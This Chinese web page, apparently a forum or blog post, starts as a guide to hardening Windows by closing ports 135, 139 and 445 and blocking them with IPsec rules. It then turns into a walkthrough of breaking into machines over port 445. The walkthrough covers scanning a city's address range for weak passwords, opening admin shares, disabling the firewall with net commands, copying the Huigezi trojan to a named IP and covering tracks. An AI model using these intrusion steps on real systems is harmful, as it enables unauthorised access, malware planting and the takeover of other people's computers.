关闭端口

关闭端口 1.关闭135端口: 运行dcomcnfg,展开“组件服务”?“计算机”，在“我的电脑”上点右键选“属性”，切换到“默认属性”，取消“启用分布式COM”;然后切换到“默认协议”，删除“面向连接的TCP/IP”。 2. 关闭139端口: 右键本地连接选属性(有的是本地连接1或者2之类的，反正选那个生效的连接就是了);接着选Internet 协议 (TCP/IP)，再点“属性”按钮;在Internet 协议 (TCP/IP)属性窗口点“高级按钮“;在高级TCP/IP设置窗口选WINS选项卡，再选中单选框中的”禁用 TCP/IP 上的 NetBIOS"，最后确定即可。 3.关闭445端口: 通过修改注册来屏蔽，填加一个键值 HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters点击Parameters在右边找到SMBDeviceENABLED，将值该为0，修改后重启电脑 4.关闭IPS$ HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentConteolset \ Control \ Lsa项，找到restrictanonymous键值，将键值设为1。 5.自定义安全策略 执行"开始-控制面板-管理工具-本地安全策略"在打开的"本地安全设置"窗口中选"IP安全策略 在本地计算机" 在窗口右边空白处单击鼠标右键,选'创建IP安全策略"在弹出的向导中单击"下一步",然后在名称一栏中输入"阻止危险的端口",再单击"下一步"取消对"激活默认响应规则"的选中. 单击"下一步"-"完成" 在"阻止危险端口 属性"对话框中取消对"使用添加向导"的勾选. 单击"添加" 在"新规则属性"对话框中单击"添加"按钮 弹出"IP筛选器列表" 取消对"使用添加向导"的勾选. 单击"添加",在"寻址"页面的"源地址"中选择"任何IP地址",在"目标地址"中选"我的IP地址" 切换到"协议"选项卡在协议类型中选"TCP",然后在"到此端口"中输入"135" 单击"确定"按钮返回"IP筛选器列表"重复以上步骤为其他需要关闭的窗口建立相应的筛选器.完成后单击"确定"在"新规则属性"窗口中选中"新IP筛选器列表" 切换到"筛选器操作"选项卡取消对"使用添加向导"的勾选 然后单击"添加"在"新筛选器操作属性"窗口的"安全"选项卡中选择"阻止" 点"确定"返回"新规则属性"选中"新筛选器操作"后,单击"关闭" 在"阻止危险的端口属性"中选"新IP筛选器列表" 关闭,返回"本地安全设置"用鼠标右键单击"阻止危险的端口"在弹出的菜单中选"指派'命令 除了135 445外,其实还有危险的端口:TCP中的135 445 593 1025 3389 UDP中的135 139 445 6.在系统文件夹system32里找ftp.exe、cmd.exe、at.exe、net.exe和net1.exe. 把它们的权限设置最低。 7. 最后设置复杂的用户密码、禁用多余的用户、开启防火墙，禁用不必要的服务、在组策略里设置网络访问策略、经常给系统打补丁、每过一段时间，检测一下系统安全性。 如何利用445端口入侵 用到的工具有 一.扫描器 二.NTscan汉化版 三.灰鸽子木马 四.阿D网络工具包 我们扫445端口，由于445端口受到网络的限制，我们只能扫本市的，不过大家可以到肉鸡 上扫，呵呵，那可是肉鸡生肉鸡啊 我是××的就扫一个××的IP吧，就不到肉鸡扫了 看样子，一会肉鸡会很多，一会我就不全扫了 我们扫完后，整理一下然后用二.NTscan汉化版扫描弱口令 现在就用 用WMI扫 好出来了，我就不扫了哦 现在就是用啊D了啊，找开远程开共享，然后传马 密码就是空的了啊 进去，去开共享吧 想开哪个盘就开哪个盘 我一会开D盘 下来就是开本地的cmd传马了啊 先建个空连接大家也可以用啊D里的种植机传马 我们传马时要把马和CMD的目录放在一起，不然会说我们找不到马 我们在C盘的晕错了，我们要在本地的CMD上做 谁在这个电脑上传过马了好，们的马运行成功了 看59。52。61。5上线，下面我们要清理战场 net share 查看它有没有开共享 net stop sharedaccess 关防火墙 net share d$=d:/ D盘共享开启 copy server.exe \\59.52.61.5\d$ 传木马到肉鸡的D盘里 net share d$ /del 把以D盘共享删掉 net use \\59.52.61.5 与某个IP建空连接